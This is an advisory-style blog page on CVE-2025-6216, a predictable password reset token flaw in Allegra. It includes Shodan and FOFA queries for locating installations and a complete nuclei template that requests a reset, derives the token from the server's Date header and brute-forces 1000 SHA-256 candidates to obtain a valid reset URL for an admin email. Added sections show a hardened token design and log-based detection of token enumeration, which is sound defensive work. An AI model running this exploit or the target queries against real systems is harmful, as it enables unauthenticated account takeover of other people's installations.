Allegra Authentication Bypass via Predictable Password Reset Token

Vulnerability Information

Vulnerability name: Allegra Authentication Bypass via Predictable Password Reset Token

Vulnerability ID:

  • CVE: CVE-2025-6216

Vulnerability type: Permission bypass

Severity: Critical

Description: Allegra is a widely used application, deployed mainly in enterprise services, that provides functions such as password recovery. Because it is so widely deployed, the impact of this vulnerability is broad. The vulnerability lies in the password recovery mechanism: the password reset token is generated from a predictable value. This design flaw lets an attacker predict the reset token and thereby bypass authentication. The technical root cause is that the token generation algorithm lacks sufficient randomness, so the token can be predicted. A remote attacker can therefore, without any authentication, bypass the authentication mechanism by predicting the password reset token and gain unauthorized access. An attacker exploiting this vulnerability can access sensitive data and even take full control of the system, posing a serious threat to system integrity and data security. Because the attack requires neither user interaction nor authentication, it can be automated, which increases the risk of exploitation.
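The following Python is an added illustration, not Allegra's code. `weak_token` models the flaw class described above (a token that is a pure function of a predictable expiry timestamp, the shape CWE-640 covers), and `ResetTokenStore` is an assumed hardened design: the token comes from the OS CSPRNG rather than the clock, only its digest is stored, it is short-lived and single-use. The class name, the 15-minute TTL and the storage layout are assumptions.

```python
"""Weak vs. hardened reset-token design (added illustration, not Allegra's code).

weak_token models the flaw class the advisory describes: a token that is a pure
function of a predictable expiry timestamp. ResetTokenStore is an assumed design:
OS-random token, hashed at rest, short-lived, single-use."""
import hashlib
import secrets
import time
from typing import Callable, Dict, Optional, Tuple


def weak_token(expiry_ms: int) -> str:
    """Deterministic: the same expiry time always yields the same token, so anyone
    who can estimate the server clock can enumerate candidates offline."""
    return hashlib.sha256(str(expiry_ms).encode()).hexdigest()


RESET_TTL_SECONDS = 15 * 60  # assumed policy: reset tokens live 15 minutes


class ResetTokenStore:
    """Keeps only SHA-256 digests of issued tokens, mapped to (user_id, expiry)."""

    def __init__(self, now: Callable[[], float] = time.time) -> None:
        self._now = now  # injectable clock so expiry can be tested deterministically
        self._by_digest: Dict[str, Tuple[str, float]] = {}

    @staticmethod
    def _digest(token: str) -> str:
        # Hashing before lookup means a database leak exposes no usable tokens,
        # and the dict lookup is not a timing oracle on the secret itself.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id: str) -> str:
        """Return a fresh token for the reset e-mail; only its digest is stored."""
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG, not the clock
        self._by_digest[self._digest(token)] = (user_id, self._now() + RESET_TTL_SECONDS)
        return token

    def redeem(self, token: str) -> Optional[str]:
        """Return the owning user_id if the token is known and unexpired, else None.
        Tokens are single-use: a known token's entry is removed on first redemption."""
        entry = self._by_digest.pop(self._digest(token), None)
        if entry is None:
            return None
        user_id, expires_at = entry
        if self._now() > expires_at:
            return None
        return user_id
```

The contrast is the point: `weak_token` needs no secret at all, only an estimate of the server time, whereas a token from `secrets.token_urlsafe(32)` cannot be reproduced from anything the server exposes, and storing only its digest keeps a leaked table from being usable.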

Vendor: alltena

Product: Allegra

Affected versions: *

Search query: http.favicon.hash:"284403119" OR icon_hash="284403119"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/166fb0dcd25baf3a330fdd73002efcd242a23988/code%2Fcves%2F2025%2FCVE-2025-6216.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC Details


id: CVE-2025-6216

info:
  name: Allegra - Authentication Bypass via Predictable Password Reset Token
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Allegra calculateTokenExpDate Password Recovery Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the password recovery mechanism. The issue results from reliance upon a predictable value when generating a password reset token. An attacker can leverage this vulnerability to bypass authentication on the application.
  impact: |
    An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the application, potentially compromising sensitive data and system integrity.
  remediation: |
    Upgrade Allegra to version 8.1.4 or 7.5.2 or later to fix the predictable password reset token vulnerability.
  reference:
    - https://www.zerodayinitiative.com/advisories/ZDI-25-410/
    - https://alltena.com/en/resources/release-notes/release-notes-for-release-8-1-4-and-release-7-5-2
    - https://nvd.nist.gov/vuln/detail/CVE-2025-6216
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-6216
    cwe-id: CWE-640
    cpe: cpe:2.3:a:alltena:allegra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: alltena
    product: allegra
    shodan-query: http.favicon.hash:"284403119"
    fofa-query: icon_hash="284403119"
  tags: cve,cve2025,allegra,auth-bypass,predictable-token,reset

variables:
  email: "admin@mydomainxxx.com" # Change to a test account

flow: http(1) && code()

http:
  - raw:
      - |
        POST /resetPassword.action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        email={{email}}&fromAjax=true&_dc=1750669432104&perspectiveType=&appActionID=

    extractors:
      - type: regex
        name: date_header
        part: header
        internal: true
        group: 1
        regex:
          - "Date: (.*)"

    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "emailSent"
          - '"success":true'
        condition: and

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei
    source: |
      import requests
      import hashlib,os
      import time
      from datetime import datetime, timezone
      from email.utils import parsedate_to_datetime

      def get_server_time(response):
          date_header = response.headers.get('Date')
          if date_header:
              return parsedate_to_datetime(date_header)
          return None

      def main():
          BASE_URL = os.getenv("BaseURL")
          EMAIL = os.getenv("email")
          date_header = os.getenv("date_header")
          server_time = parsedate_to_datetime(date_header)
          if not server_time:
              return
          server_time_ms = int(server_time.timestamp() * 1000)
          expiry_time_ms = server_time_ms + 28800000
          base_expiry_sec = (expiry_time_ms // 1000) * 1000
          for ms in range(1000):
              candidate_expiry_ms = base_expiry_sec + ms
              token = hashlib.sha256(str(candidate_expiry_ms).encode()).hexdigest()
              test_url = f"{BASE_URL}/resetPassword!confirm.action?ctk={token}"
              r = requests.get(test_url, allow_redirects=False)
              if 'com.trackplus.app.logon.ResetPasswordApplication' in r.text:
                  print(test_url)
                  return

      if __name__ == "__main__":
          main()

    matchers:
      - type: dsl
        dsl:
          - contains(code_response, "/resetPassword!confirm.action?ctk=")

    extractors:
      - type: dsl # type of the extractor
        dsl:
          - '"Reset URL: " + code_response'
# digest: 4b0a00483046022100d59748595f6cc13b789b45b1b70fa7456e85389d00ebade00416bc13322030ae022100fdc0a9151f91f606b9f69221833d79ca5cbe89c2eb8d1da315759fa149b5f350:f54de283b4eb358da492cc866d2be612
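The template's code block issues one POST to `/resetPassword.action` and then up to 1000 GETs to `/resetPassword!confirm.action` with a different `ctk` value each, all from one source within seconds. A legitimate user presents exactly one token, so the distinct-token rate per source is the signal a defender can watch. The following detection logic is an added example, not part of the template or of Allegra; it runs over constructed access-log lines in Common Log Format, and the threshold (more than 10 distinct tokens in a 60 s sliding window) and the placeholder token values are assumptions.

```python
"""Detecting reset-token enumeration in web access logs (added example; the
log lines are constructed and the paths follow the nuclei template above)."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

CONFIRM_PATH = "/resetPassword!confirm.action"

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one CLF line into ip, ts, method, path, ctk, status; None if malformed."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlparse(m["target"])
    ctk = parse_qs(url.query).get("ctk", [None])[0]
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": url.path,
        "ctk": ctk,
        "status": int(m["status"]),
    }


def find_token_enumeration(lines: Iterable[str], window_seconds: int = 60,
                           max_distinct_tokens: int = 10) -> List[Tuple[str, int]]:
    """Return (ip, distinct_token_count) for every source that presents more than
    max_distinct_tokens different ctk values to the confirm endpoint inside any
    sliding window of window_seconds. One alert per source, at first crossing."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for ev in map(parse_line, lines):
        if ev and ev["path"] == CONFIRM_PATH and ev["ctk"]:
            by_ip[ev["ip"]].append(ev)
    alerts: List[Tuple[str, int]] = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        counts: Dict[str, int] = {}  # token -> occurrences inside the window
        start = 0
        for ev in evs:
            counts[ev["ctk"]] = counts.get(ev["ctk"], 0) + 1
            # Slide the window start forward, dropping tokens that fell out of it
            while (ev["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                old = evs[start]["ctk"]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            if len(counts) > max_distinct_tokens:
                alerts.append((ip, len(counts)))
                break
    return alerts


def constructed_sample_log() -> List[str]:
    """Constructed lines: one source submitting 30 different tokens in 30 s
    (the shape of the PoC loop) and one source submitting a single token."""
    lines = ['203.0.113.5 - - [12/Jul/2025:10:00:00 +0000] "POST /resetPassword.action HTTP/1.1" 200 87']
    for i in range(30):
        placeholder_token = f"{i:064x}"  # distinct placeholder values, not real tokens
        lines.append(
            f'203.0.113.5 - - [12/Jul/2025:10:00:{i + 1:02d} +0000] '
            f'"GET {CONFIRM_PATH}?ctk={placeholder_token} HTTP/1.1" 200 512'
        )
    lines.append(
        '198.51.100.7 - - [12/Jul/2025:10:05:00 +0000] '
        f'"GET {CONFIRM_PATH}?ctk={"b" * 64} HTTP/1.1" 200 512'
    )
    return lines


if __name__ == "__main__":
    for ip, n in find_token_enumeration(constructed_sample_log()):
        print(f"ALERT {ip}: {n} distinct reset tokens within 60 s")
```

Status codes are deliberately not part of the rule: in the template every guess returns 200 and only the body distinguishes a hit, so a rule keyed on 4xx responses would miss this pattern. The same counter can be fed from a WAF or reverse proxy in front of Allegra until the 8.1.4 / 7.5.2 upgrade named in the template's remediation is applied.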



URL: http://example.com/2025/07/12/github_1935153627/
Author: lianccc
Published: July 12, 2025